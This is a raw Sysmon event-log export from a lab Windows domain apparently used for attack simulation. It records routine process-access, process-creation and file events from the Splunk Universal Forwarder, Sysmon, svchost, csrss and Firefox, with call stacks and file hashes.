21:45:05.942{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150333Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.942{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E1-60CA-140D-00000000D101}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150332Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.941{39BD8DE3-70E1-60CA-140D-00000000D101}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000150331Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.727{39BD8DE3-70E1-60CA-130D-00000000D101}40726464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150330Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.724{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CC0A2B6D5D7E2A3E856C4A47656D2AD,SHA256=101FD6A0FE63F7CD78D03625564809DEB5CD1F509BAEB0EBF005A7EA125829A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150329Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.496{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91716C1321916F04FF1A5524B7500AF5,SHA256=4BEA1BF8656BDEC5DBF3580E22B2C8555B7D62ED1AC840B91C9F6C40FDCB0554,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150328Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E1-60CA-130D-00000000D101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150327Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150326Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150325Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150324Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150323Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-70E1-60CA-130D-00000000D101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150322Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.343{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E1-60CA-130D-00000000D101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150321Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.344{39BD8DE3-70E1-60CA-130D-00000000D101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x8000000000000000150320Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.259{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\SiteSecurityServiceState.txt2021-06-16 13:49:50.908 23542300x8000000000000000150319Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.259{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\SiteSecurityServiceState.txtMD5=10D128CC28380E7586BF5F2EE379BF96,SHA256=13F86455A8DFC5C1CB4962091C8E74D9549686A084ED8113F29B086A03AFD5A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104765Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:06.889{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8681BCF42C0AFC27BD047B691DCF380,SHA256=9E4A8FCB36839EBBA45830F9C44E4F80DB1D97FDA2ECF50A4398DD021571462E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104764Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:06.501{54715871-FD18-60C9-1000-00000000CF01}380NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C4996551E36E47789884EA86AA5C4E80,SHA256=03A628A9F9AE088A1DA10D3CD88ADF138A0F7AE68762A95A2710AD13DC0CBD66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150341Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:06.743{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3AA72A4E75122E82786BA28B0392935,SHA256=A55CF403D490E84FDD9083F860D26AEAC9D8E5FDE3A8BAA85543F825DCD8E36D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150340Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:06.524{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7E37F1D35ADE33777D8D9EDB97C859C,SHA256=76AEA001F2E18ED82E95003E3952EC4A9740C9C4C413AF62BBA518DEAAA9ED67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104766Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:07.570{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28301ED1FC1B447F92162C73692C2EF,SHA256=CC8C318C736962452A44A351C5178F2C12F22C2AA7CDB997867B37AF8D6A35F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150351Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.848{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E3-60CA-150D-00000000D101}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150350Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.846{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150349Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.845{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150348Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.845{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150347Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.845{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150346Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.845{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-70E3-60CA-150D-00000000D101}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150345Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.845{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E3-60CA-150D-00000000D101}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150344Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.844{39BD8DE3-70E3-60CA-150D-00000000D101}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150343Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.612{39BD8DE3-480D-60CA-F607-00000000D101}5112NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150342Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:07.541{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=610065843BAEB96E32D9E7DEC71CA3BC,SHA256=0AFFE9987260B68B2C9B14DE241703292FEE4CCCC3869BB41A79D3DCBF4E21B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104767Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:08.935{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58AF2F74AEC1DC53F9EE0BABFDF48A9D,SHA256=938EB84ED74A2218F28BA12737C25660047C6085249EBE92BA827121E50A9D5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150363Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.680{39BD8DE3-70E4-60CA-160D-00000000D101}33001292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150362Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:08.549{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E1AE3C98AB803C22CFA58088A7DEB81,SHA256=97943610923DA72CED7271363DB59F7437B0DB1F7BBC693BDACF754976530CA9,IMPHASH=00000000000000000000000000000000falsetrue 